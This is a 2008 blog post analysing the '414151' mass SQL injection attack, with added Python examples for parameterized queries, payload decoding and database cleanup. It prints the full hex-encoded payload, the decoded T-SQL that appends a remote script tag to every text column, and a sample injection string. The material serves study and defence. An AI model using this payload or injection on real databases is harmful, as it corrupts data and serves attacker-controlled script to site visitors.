SQL Injection is cool
April 18th, 2008
Overview
So seeing sites hacked is pretty cool unless it's one of yours. I kind of look at hacking as the end-all-be-all of elite programming. Of course, the intent isn't always good, but the techniques are artful. I most recently witnessed an impressive SQL Injection hack on a website. I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack", which appears to be the same code implemented a little differently. Anyone who has been hacked by this code will recognize these numbers. As far as SQL Injection attacks go, this one seems to have taken a similarly systematic approach. I am not going to explain how SQL Injection works or the techniques hackers use; there are plenty of sources on the internet for that. I will list some references at the end.
The Details
There were a couple things that impressed me about this particular hack.
- The outcome was that the hack code appended a <script> tag with a reference URL to every text, ntext, varchar and nvarchar column in every user table of the database (exactly the set of column types the SQL statement below enumerates). The site was running .NET and IIS with SQL Server 2000. I mention the technology because the script assumes SQL Server. That said, don't fool yourself into thinking that this is some hole within .NET, IIS or SQL Server; these attacks are the result of lazy programming practices, specifically building SQL statements inline by concatenating request data into the query text, and they can occur on almost any platform, language or database. The effect on users was a slow site, because every page waited on a script reference that did not resolve. That was a good thing: there is no telling what other damage might have been done had the script been live.
- The second thing that impressed me was the actual code that executed this column manipulation. It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that, when interpreted, was an equally elegant SQL statement. The hex is simply the statement encoded as UTF-16LE, the encoding SQL Server uses for nvarchar data: two bytes per character with the low byte first, which is why every other byte is 00. Whether or not disguise was the intent, the effect is that the payload itself contains no recognizable keywords; a filter scanning requests for words such as update or script sees only a run of hex digits.
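The root cause above, modelled as an added example (my own code, not from the original post or the site it describes). SQLite stands in for SQL Server, and executescript() is used to imitate a SQL Server batch, where every statement in the string the application sends gets executed; that modelling choice, the products table, its rows and the request parameter are all constructed for the demonstration. The parameterized version is what the page code should have done.

```python
import sqlite3

# The tag the attack appended to every row (quoted from the post).
SCRIPT_TAG = "<script src=http://www.414151.com/fjp.js></script>"

# Constructed request parameter: a legitimate id, then a second statement that
# appends the tag to a column, then a comment to swallow whatever SQL follows.
INJECTED_ID = (
    "1; UPDATE products SET description = rtrim(description) || '"
    + SCRIPT_TAG + "'; --"
)


def fresh_db():
    """Constructed sample table standing in for a site's product catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany(
        "INSERT INTO products (id, name, description) VALUES (?, ?, ?)",
        [(1, "Widget", "A widget"), (2, "Gadget", "A gadget")],
    )
    conn.commit()
    return conn


def lookup_inline(conn, product_id):
    """Vulnerable: the request value is pasted straight into the SQL text.

    executescript() models SQL Server batch semantics (an ASP.NET page hands the
    whole string to the server, which runs every statement in it). That is an
    assumption about the page's .NET/SQL Server setup, not code from the post.
    """
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    conn.executescript(sql)  # runs the SELECT *and* anything injected after it


def lookup_parameterized(conn, product_id):
    """Hardened: the value is bound separately and can never become SQL."""
    return conn.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    ).fetchall()


def descriptions(conn):
    """What the description column holds, in id order."""
    return [row[0] for row in conn.execute("SELECT description FROM products ORDER BY id")]


def demo():
    """Run both versions against the injected parameter; return what each left behind."""
    vulnerable = fresh_db()
    lookup_inline(vulnerable, INJECTED_ID)
    hardened = fresh_db()
    rows = lookup_parameterized(hardened, INJECTED_ID)
    return descriptions(vulnerable), rows, descriptions(hardened)


if __name__ == "__main__":
    after_inline, rows, after_param = demo()
    print("inline SQL left behind:", after_inline)
    print("parameterized query returned", rows, "and left behind:", after_param)
```

With the parameterized query the injected string is compared against the integer id column as a value, matches nothing, and the table is untouched; "1" still finds the widget. The inline version executes the attacker's UPDATE as a second statement in the batch, which is the whole story of this attack in miniature.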
The Possibilities
The possibilities of this hack scare me (and impress me). When I started searching around the web for this 414151 script I found a good number of references. Unfortunately, I didn't find many people talking about the hack; instead I found hundreds of sites that had also been hacked. I list one link below to an article that discusses it at length. According to that article, many large websites such as USA Today, ABC News, Target and Walmart have all been infected with a similar hack.
It is quite frightening to think of such an effective and widespread hack that is basically designed to "phone home" and execute whatever JavaScript the author chooses, whenever he decides to turn on his website (a synchronized attack scenario). Well, I think it would have made the news.
The JavaScript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
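To check that the hex really is the statement shown next, here is a small decoder, added here and not part of the original post. It takes the hex exactly as printed above, decodes it as UTF-16LE, and also shows how to pull such literals out of a request line and flag the keywords they contain. The sample request line is constructed for the example, and the DECLARE/CAST/EXEC wrapper around the literal is my assumption about how the payload reached the database, not something the post shows.

```python
import re

# The hex as printed above, line by line (whitespace is ignored when decoding).
PAYLOAD_HEX = (
    "4400450043004C00410052004500200040005400200076006100720"
    "06300680061007200280032003500350029002C00400043002000760061007"
    "20063006800610072002800320035003500290020004400450043004C00"
    "41005200450020005400610062006C0065005F0043007500720073006F"
    "007200200043005500520053004F005200200046004F005200200073006"
    "5006C00650063007400200061002E006E0061006D0065002C0062002E"
    "006E0061006D0065002000660072006F006D0020007300790073006F006"
    "2006A006500630074007300200061002C0073007900730063006F006C"
    "0075006D006E00730020006200200077006800650072006500200061002"
    "E00690064003D0062002E0069006400200061006E006400200061002E"
    "00780074007900700065003D00270075002700200061006E00640020002"
    "80062002E00780074007900700065003D003900390020006F007200200"
    "062002E00780074007900700065003D003300350020006F007200200062"
    "002E00780074007900700065003D0032003300310020006F0072002000"
    "62002E00780074007900700065003D00310036003700290020004F00500"
    "045004E0020005400610062006C0065005F0043007500720073006F007"
    "20020004600450054004300480020004E004500580054002000460052004"
    "F004D00200020005400610062006C0065005F0043007500720073006F"
    "007200200049004E0054004F002000400054002C0040004300200057004"
    "80049004C004500280040004000460045005400430048005F005300540"
    "041005400550053003D0030002900200042004500470049004E00200065"
    "007800650063002800270075007000640061007400650020005B002700"
    "2B00400054002B0027005D00200073006500740020005B0027002B0040"
    "0043002B0027005D003D0072007400720069006D00280063006F006E0"
    "07600650072007400280076006100720063006800610072002C005B0027"
    "002B00400043002B0027005D00290029002B00270027003C007300630"
    "0720069007000740020007300720063003D0068007400740070003A002F"
    "002F007700770077002E003400310034003100350031002E0063006F00"
    "6D002F0066006A0070002E006A0073003E003C002F0073006300720069"
    "00700074003E0027002700270029004600450054004300480020004E00"
    "4500580054002000460052004F004D00200020005400610062006C00650"
    "05F0043007500720073006F007200200049004E0054004F00200040005"
    "4002C0040004300200045004E004400200043004C004F00530045002000"
    "5400610062006C0065005F0043007500720073006F0072002000440045"
    "0041004C004C004F00430041005400450020005400610062006C0065005"
    "F0043007500720073006F007200"
)

# A long 0x literal in a request is the tell; short ones are normal in SQL.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{16,})")

# Words whose presence in a decoded literal make it worth a closer look.
WATCH_WORDS = ("DECLARE", "CURSOR", "EXEC", "UPDATE", "SYSOBJECTS", "SCRIPT")


def decode_utf16le_hex(hex_text):
    """Decode a hex string (0x prefix and whitespace allowed) as UTF-16LE text.

    SQL Server stores nvarchar as UTF-16LE, so CAST(0x... AS NVARCHAR(n)) yields
    exactly this; every second byte is 00 for plain ASCII."""
    digits = re.sub(r"\s+", "", hex_text)
    if digits[:2].lower() == "0x":
        digits = digits[2:]
    if len(digits) % 4:
        raise ValueError("not a whole number of UTF-16 code units")
    return bytes.fromhex(digits).decode("utf-16-le")


def extract_payloads(request_text):
    """Find every long 0x literal in a request or log line and decode it."""
    return [decode_utf16le_hex(m.group(1)) for m in HEX_LITERAL.finditer(request_text)]


def keywords_present(sql_text):
    """Sorted list of watch words found in the decoded text (case-insensitive)."""
    upper = sql_text.upper()
    return sorted(w for w in WATCH_WORDS if w in upper)


# Constructed log line; the wrapper around the literal is an assumption, see lead-in.
SAMPLE_REQUEST = (
    "GET /products.aspx?id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + PAYLOAD_HEX + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200"
)

if __name__ == "__main__":
    for payload in extract_payloads(SAMPLE_REQUEST):
        print(keywords_present(payload))
        print(payload)
```

The length check matters in practice: a literal cut off by a log field limit decodes to garbage or not at all, so treat an odd-length literal as truncated rather than harmless.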
The SQL Statement
Decoded, the hex is the batch below (quotes restored to plain ASCII; the original is one line). It opens a cursor over every column of every user table (sysobjects xtype 'u') whose type is ntext (99), text (35), nvarchar (231) or varchar (167), and for each one runs a dynamic update that appends the script tag. Note that convert(varchar, ...) with no length defaults to 30 characters, so any value longer than that was truncated before the tag was appended; the data in those columns was lost, not merely suffixed, and only a backup gets it back.
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.414151.com/fjp.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
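The cursor enumerates every text column of every user table, and cleaning up has to make the same walk in the other direction. Below is an added example, my own code rather than anything from the original post, doing that against a constructed SQLite database: it finds every column with text affinity, counts the rows carrying the tag, and strips it with replace(), which also handles rows the attack hit more than once. The schema and rows are made up for the demonstration; on SQL Server the column walk would go through sysobjects/syscolumns just as the attack did.

```python
import sqlite3

# The tag the attack appended (quoted from the post); the marker we search for.
SCRIPT_TAG = "<script src=http://www.414151.com/fjp.js></script>"


def quote_ident(name):
    """Double-quote an identifier taken from the catalogue before splicing it into SQL."""
    return '"' + name.replace('"', '""') + '"'


def text_columns(conn):
    """Every (table, column) whose declared type has TEXT affinity (CHAR/CLOB/TEXT),
    the SQLite counterpart of the xtype list in the attack's cursor."""
    found = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
    ).fetchall()
    for (table,) in tables:
        for row in conn.execute("PRAGMA table_info(" + quote_ident(table) + ")"):
            declared = (row[2] or "").upper()  # row = (cid, name, type, notnull, dflt, pk)
            if any(k in declared for k in ("CHAR", "CLOB", "TEXT")):
                found.append((table, row[1]))
    return found


def find_infected(conn, marker):
    """Rows per text column that contain the marker; columns with no hits are omitted."""
    counts = {}
    for table, column in text_columns(conn):
        n = conn.execute(
            "SELECT count(*) FROM %s WHERE instr(%s, ?) > 0"
            % (quote_ident(table), quote_ident(column)),
            (marker,),
        ).fetchone()[0]
        if n:
            counts[(table, column)] = n
    return counts


def clean(conn, marker):
    """Remove every occurrence of the marker from every text column; returns rows changed.
    replace() strips repeated tags, so rows hit by several runs of the attack come clean too."""
    changed = 0
    for table, column in text_columns(conn):
        col = quote_ident(column)
        cur = conn.execute(
            "UPDATE %s SET %s = replace(%s, ?, '') WHERE instr(%s, ?) > 0"
            % (quote_ident(table), col, col, col),
            (marker, marker),
        )
        changed += cur.rowcount
    conn.commit()
    return changed


def sample_db():
    """Constructed database: a catalogue and a comments table, some rows already hit (one twice)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(255), description TEXT, stock INTEGER)"
    )
    conn.execute(
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, body NTEXT, posted_at VARCHAR(32))"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", [
        (1, "Widget", "A widget" + SCRIPT_TAG, 5),
        (2, "Gadget", "A gadget" + SCRIPT_TAG + SCRIPT_TAG, 0),  # hit by two runs
        (3, "Sprocket", "Untouched", 12),
    ])
    conn.executemany("INSERT INTO comments VALUES (?, ?, ?)", [
        (1, "Nice" + SCRIPT_TAG, "2008-04-18"),
        (2, "Fine", "2008-04-19"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = sample_db()
    print("infected before:", find_infected(db, SCRIPT_TAG))
    print("rows cleaned:", clean(db, SCRIPT_TAG))
    print("infected after:", find_infected(db, SCRIPT_TAG))
```

Two caveats a practitioner should keep in mind. The payload's rtrim() and the 30-character convert() default already destroyed data this cleanup cannot restore, so compare against a backup rather than trusting the cleaned rows. And cleaning without fixing the inline SQL that let the statement in just schedules the next reinfection; the attack was automated and came back.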
Other references
- http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html - this great article dives deep into the general attack
- http://www.webhostingtalk.com/showthread.php?t=686032
- http://en.wikipedia.org/wiki/SQL_injection
- http://www.securiteam.com/securityreviews/5DP0N1P76E.html
Update (4/29)…
This one keeps going and going.
- http://hackademix.net/2008/04/26/mass-attack-faq/#comment-7742 - another great article talking about this specific attack
- http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/
- http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_1.html
I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks. I didn't mention this earlier because it is inherent in all SQL Injection attacks.